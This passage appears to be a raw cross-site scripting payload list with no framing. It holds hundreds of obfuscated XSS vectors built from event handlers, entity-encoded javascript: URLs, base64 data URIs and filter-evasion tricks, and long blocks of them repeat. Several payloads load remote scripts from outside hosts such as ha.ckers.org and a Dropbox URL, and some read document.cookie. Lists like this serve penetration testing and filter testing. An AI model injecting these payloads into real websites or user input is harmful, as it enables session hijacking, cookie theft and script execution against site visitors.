onload=prompt&lpar;1&rpar;&gt;'> +<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> +<script ~~~>alert(0%0)</script ~~~> +<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> +<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN 
+<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) +&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' +&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} +<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ +<div/style="width:expression(confirm(1))">X</div> {IE7} +<iframe/%00/ src=javaSCRIPT&colon;alert(1) +//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>// +/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> +//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ +</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style> +<a/href="javascript:&#13; javascript:prompt(1)"><input type="X"> +</plaintext\></|\><plaintext/onmouseover=prompt(1) +</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} +<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> +<div onmouseover='alert&lpar;1&rpar;'>DIV</div> +<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> +<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> +<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<var onmouseover="prompt(1)">On Mouse Over</var> +<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> +<img src="/" =_=" title="onerror='prompt(1)'"> +<%<!--'%><script>alert(1);</script --> +<script src="data:text/javascript,alert(1)"></script> +<iframe/src \/\/onload = prompt(1) +<iframe/onreadystatechange=alert(1) +<svg/onload=alert(1) +<input value=<><iframe/src=javascript:confirm(1) +<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> +http://www.<script>alert(1)</script .com +<iframe 
src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> +<svg><script ?>alert(1) +<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> +<img src=`xx:xx`onerror=alert(1)> +<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> +<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> +<math><a xlink:href="//jsfiddle.net/t846h/">click +<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> +<svg contentScriptType=text/vbs><script>MsgBox+1 +<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a +<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> +<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. 
\u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ +<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F +<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script +<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> +<script>+-+-1-+-+alert(1)</script> +<body/onload=&lt;!--&gt;&#10alert(1)> +<script itworksinallbrowsers>/*<script* */alert(1)</script +<img src ?itworksonchrome?\/onerror = alert(1) +<svg><script>//&NewLine;confirm(1);</script </svg> +<svg><script onlypossibleinopera:-)> alert(1) +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe +<script x> alert(1) </script 1=2 +<div/onmouseover='alert(1)'> style="x:"> +<--`<img/src=` onerror=alert(1)> --!> +<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> +<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> +"><img src=x onerror=window.open('https://www.google.com/');> +<form><button formaction=javascript&colon;alert(1)>CLICKME +<math><a xlink:href="//jsfiddle.net/t846h/">click +<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> +<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> +<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> +‘; alert(1); +‘)alert(1);// +<ScRiPt>alert(1)</sCriPt> +<IMG SRC=jAVasCrIPt:alert(‘XSS’)> +<IMG SRC=”javascript:alert(‘XSS’);”> +<IMG SRC=javascript:alert(&quot;XSS&quot;)> +<IMG SRC=javascript:alert(‘XSS’)> +<img src=xss 
onerror=alert(1)> +<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00> +<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' +<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" +<sVg><scRipt %00>alert&lpar;1&rpar; {Opera} +<img/src=`%00` onerror=this.onerror=confirm(1) +<form><isindex formaction="javascript&colon;confirm(1)" +<img src=`%00`&NewLine; onerror=alert(1)&NewLine; +<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> +<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? +<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> +<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ +&#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00 +<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>"> +<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> +<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script +<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} +<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> +<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> +<form><a href="javascript:\u0061lert&#x28;1&#x29;">X +</script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'> +<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)> +<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;> +<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a +http://www.google<script .com>alert(document.location)</script +<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a +<img/src=@&#32;&#13; onerror = prompt('&#49;') +<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41; +<script ^__^>alert(String.fromCharCode(49))</script ^__^ +</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( +&#00;</form><input type&#61;"date" 
onfocus="alert(1)"> +<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> +<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ +<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> +<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> +<script ~~~>alert(0%0)</script ~~~> +<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> +<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN +<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) +&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' +&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} +<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ +<div/style="width:expression(confirm(1))">X</div> {IE7} +<iframe/%00/ src=javaSCRIPT&colon;alert(1) +//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>// +/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> +//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ +</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style> +<a/href="javascript:&#13; javascript:prompt(1)"><input type="X"> +</plaintext\></|\><plaintext/onmouseover=prompt(1) +</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} +<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> +<div onmouseover='alert&lpar;1&rpar;'>DIV</div> +<iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> +<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> +<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<var onmouseover="prompt(1)">On Mouse Over</var> +<a 
href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> +<img src="/" =_=" title="onerror='prompt(1)'"> +<%<!--'%><script>alert(1);</script --> +<script src="data:text/javascript,alert(1)"></script> +<iframe/src \/\/onload = prompt(1) +<iframe/onreadystatechange=alert(1) +<svg/onload=alert(1) +<input value=<><iframe/src=javascript:confirm(1) +<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> +http://www.<script>alert(1)</script .com +<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> +<svg><script ?>alert(1) +<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> +<img src=`xx:xx`onerror=alert(1)> +<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> +<math><a xlink:href="//jsfiddle.net/t846h/">click +<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> +<svg contentScriptType=text/vbs><script>MsgBox+1 +<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a 
+<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> +<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ +<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F +<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script +<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> +<script>+-+-1-+-+alert(1)</script> +<body/onload=&lt;!--&gt;&#10alert(1)> +<script itworksinallbrowsers>/*<script* */alert(1)</script +<img src ?itworksonchrome?\/onerror = alert(1) +<svg><script>//&NewLine;confirm(1);</script </svg> +<svg><script onlypossibleinopera:-)> alert(1) +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe +<script x> alert(1) </script 1=2 +<div/onmouseover='alert(1)'> style="x:"> +<--`<img/src=` onerror=alert(1)> --!> + <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> +<div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> +"><img src=x onerror=window.open('https://www.google.com/');> +<form><button formaction=javascript&colon;alert(1)>CLICKME +<math><a xlink:href="//jsfiddle.net/t846h/">click +<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> +<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> +<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> +<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 
41)</SCRIPT> +‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC=”jav ascript:alert(‘XSS’);”> +<IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”> +<<SCRIPT>alert(“XSS”);//<</SCRIPT> +%253cscript%253ealert(1)%253c/script%253e +“><s”%2b”cript>alert(document.cookie)</script> +foo<script>alert(1)</script> +<scr<script>ipt>alert(1)</scr</script>ipt> +<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> +<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<BODY BACKGROUND=”javascript:alert(‘XSS’)”> +<BODY ONLOAD=alert(‘XSS’)> +<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”> +<IMG SRC=”javascript:alert(‘XSS’)” +<iframe src=http://ha.ckers.org/scriptlet.html < +javascript:alert("hellox worldss") +<img src="javascript:alert('XSS');"> +<img src=javascript:alert(&quot;XSS&quot;)> +<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv 
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> +<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search +<script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 +<script>alert("XSS");</script>&search=1 +0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search +<h1><font color=blue>hellox worldss</h1> +<BODY ONLOAD=alert('hellox worldss')> +<input onfocus=write(XSS) autofocus> +<input onblur=write(XSS) autofocus><input autofocus> +<body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form><button formaction="javascript:alert(XSS)">lol +<!--<img src="--><img src=x onerror=alert(XSS)//"> +<![><img src="]><img src=x 
onerror=alert(XSS)//"> +<style><img src="</style><img src=x onerror=alert(XSS)//"> +<? foo="><script>alert(1)</script>"> +<! foo="><script>alert(1)</script>"> +</ foo="><script>alert(1)</script>"> +<? foo="><x foo='?><script>alert(1)</script>'>"> +<! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>"> +<% foo><x foo="%><script>alert(123)</script>"> +<div style="font-family:'foo&#10;;color:red;';">LOL +LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style> +<script>({0:#0=alert/#0#/#0#(0)})</script> +<svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg> +&lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt; +\\";alert('XSS');// +&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\"XSS\");&lt;/SCRIPT&gt; +&lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript&#058;alert('XSS');\"&gt; +&lt;BODY BACKGROUND=\"javascript&#058;alert('XSS')\"&gt; +&lt;BODY ONLOAD=alert('XSS')&gt; +&lt;IMG DYNSRC=\"javascript&#058;alert('XSS')\"&gt; +&lt;IMG LOWSRC=\"javascript&#058;alert('XSS')\"&gt; +&lt;BGSOUND SRC=\"javascript&#058;alert('XSS');\"&gt; +&lt;BR SIZE=\"&{alert('XSS')}\"&gt; +&lt;LAYER SRC=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/LAYER&gt; +&lt;LINK REL=\"stylesheet\" HREF=\"javascript&#058;alert('XSS');\"&gt; +&lt;LINK REL=\"stylesheet\" HREF=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;css\"&gt; +&lt;STYLE&gt;@import'http&#58;//ha&#46;ckers&#46;org/xss&#46;css';&lt;/STYLE&gt; +&lt;META HTTP-EQUIV=\"Link\" Content=\"&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet\"&gt; +&lt;STYLE&gt;BODY{-moz-binding&#58;url(\"http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss\")}&lt;/STYLE&gt; +&lt;XSS STYLE=\"behavior&#58; url(xss&#46;htc);\"&gt; +&lt;STYLE&gt;li {list-style-image&#58; url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS +&lt;IMG SRC='vbscript&#058;msgbox(\"XSS\")'&gt; +&lt;IMG SRC=\"mocha&#58;&#91;code&#93;\"&gt; +&lt;IMG 
SRC=\"livescript&#058;&#91;code&#93;\"&gt; +žscriptualert(EXSSE)ž/scriptu +&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript&#058;alert('XSS');\"&gt; +&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&gt; +&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http&#58;//;URL=javascript&#058;alert('XSS');\" +&lt;IFRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/IFRAME&gt; +&lt;FRAMESET&gt;&lt;FRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/FRAMESET&gt; +&lt;TABLE BACKGROUND=\"javascript&#058;alert('XSS')\"&gt; +&lt;TABLE&gt;&lt;TD BACKGROUND=\"javascript&#058;alert('XSS')\"&gt; +&lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt; +&lt;DIV STYLE=\"background-image&#58;\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028&#46;1027\0058&#46;1053\0053\0027\0029'\0029\"&gt; +&lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt; +&lt;DIV STYLE=\"width&#58; expression(alert('XSS'));\"&gt; +&lt;STYLE&gt;@im\port'\ja\vasc\ript&#58;alert(\"XSS\")';&lt;/STYLE&gt; +&lt;IMG STYLE=\"xss&#58;expr/*XSS*/ession(alert('XSS'))\"&gt; +&lt;XSS STYLE=\"xss&#58;expression(alert('XSS'))\"&gt; +exp/*&lt;A STYLE='no\xss&#58;noxss(\"*//*\"); +xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'&gt; +&lt;STYLE TYPE=\"text/javascript\"&gt;alert('XSS');&lt;/STYLE&gt; +&lt;STYLE&gt;&#46;XSS{background-image&#58;url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt; +&lt;STYLE type=\"text/css\"&gt;BODY{background&#58;url(\"javascript&#058;alert('XSS')\")}&lt;/STYLE&gt; +&lt;!--&#91;if gte IE 4&#93;&gt; +&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt; +&lt;!&#91;endif&#93;--&gt; +&lt;BASE HREF=\"javascript&#058;alert('XSS');//\"&gt; +&lt;OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/OBJECT&gt; +&lt;OBJECT 
classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#058;alert('XSS')&gt;&lt;/OBJECT&gt; +&lt;EMBED SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;swf\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt; +&lt;EMBED SRC=\"data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt; +a=\"get\"; +b=\"URL(\\"\"; +c=\"javascript&#058;\"; +d=\"alert('XSS');\\")\"; +eval(a+b+c+d); +&lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\"xss\" implementation=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;htc\"&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt; +&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\"javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert('XSS');\"&gt;&#93;&#93;&gt; +&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt; +&lt;XML ID=\"xss\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\"javas&lt;!-- --&gt;cript&#58;alert('XSS')\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt; +&lt;SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"&gt;&lt;/SPAN&gt; +&lt;XML SRC=\"xsstest&#46;xml\" 